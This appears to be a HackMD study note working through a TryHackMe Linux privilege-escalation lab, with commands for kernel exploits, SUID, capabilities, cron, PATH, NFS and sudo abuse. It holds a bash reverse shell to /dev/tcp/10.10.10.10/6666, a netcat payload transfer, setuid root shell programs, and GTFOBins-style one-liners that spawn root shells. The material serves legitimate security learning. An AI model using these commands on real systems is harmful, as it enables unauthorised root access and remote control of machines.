Try   HackMD

linux privilege

tags: tryhackme privilege

Kernel Privilege

Target INFO

systems info

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

our machine

nc -lvnp 443 -k < ovf.c

Victim

cd /var/tmp
nc 10.17.11.72 443 > ovf.c
gcc ovf.c -o ovf 
./ovf

whoami

find / -name flag.txt 

cat flag.txt

Sudo

Leverage Application

https://gtfobins.github.io/

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

It can be used to break out from restricted environments by spawning an interactive system shell.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

SUID

Problem

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Permission Bypass

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Find the special privilege of configuration file. (SUID) "s"

find / -type f -perm -04000 -ls 2>/dev/null

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Capability

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

find

getcap -r / 2>/dev/null

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

:py3 
import os
os.setuid(0)
os.execl("/bin/sh", "sh", "-c", "reset; exec sh") 
#執行 "/bin/sh" 這個程式,並傳入 "sh" 和 "-c" 參數,以及字串 "reset; exec sh"。

uid 0 -> root

execute /bin/sh

command:
sh -c reset // reset the terminal
sh -c exec sh //open new shell

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Cron

cat /etc/crontab

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

vim backup.sh
chomd -x backup.sh

bash shell

bash -l >& /dev/tcp/10.10.10.10/6666 0>&1

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

$PATH

$PATH writable

root file

#include<unistd.h>
void main(){
setuid(0);
setgid(0);
system("thm");
}


cd /tmp
echo "/bin/bash" > thm
./rootfile

NFS (Network File Share)

vulnerability options -> "no_root_squash"

Display the target share file path

showmount --export 10.0.0.12

Show the NFS server's export list.

Using the share file directory

mount -o rw 10.0.0.12:/tmp /ourmachine/directory

-o optionslist

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main (void){
setuid(0);
setgid(0);
system("bin/bash");
return 0;
}



gcc code.c -o code -w 
chmod +s code    //set Suid

Challenge

[leonard@ip-10-10-42-180 ~]$ uname -a
Linux
ip-10-10-42-180
3.10.0-1160.el7.x86_64 //kernel version
#1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64
x86_64 GNU/Linux

Gathing the systems information

Testing kernel

no vulnerability

Sudo

NO sudo privilege

SUID

Using john to crack the root password

Burp the password failed.

Corntab

Target

We could try to find user Missy and Rootflag.

Not Missy and Rootflag users

Missy password -> Password1

Sudo -l (missy)

we could use find commend to privilege escalation

sudo find . -exec /bin/sh \; -quit

flag 1

flag 2

Last changed by 
侯智晟
Email: meowheckerouo@gmail.com
0
1597

Read more

Web LLM Attack

Nowadays, Most company integrate Large Language Model into the web systems for improve customer experience.

Jun 2, 2025
Race Conditions

First Present in Black Hat USA 2023

Apr 7, 2025
Weapons And Testing Flow

Identifying Services &amp; Operating System &amp; NSE Scanning

Mar 21, 2025
X86 Assembler

E-&gt; extended -&gt; 32 bit

Mar 5, 2025
Read more from 侯智晟
Published on HackMD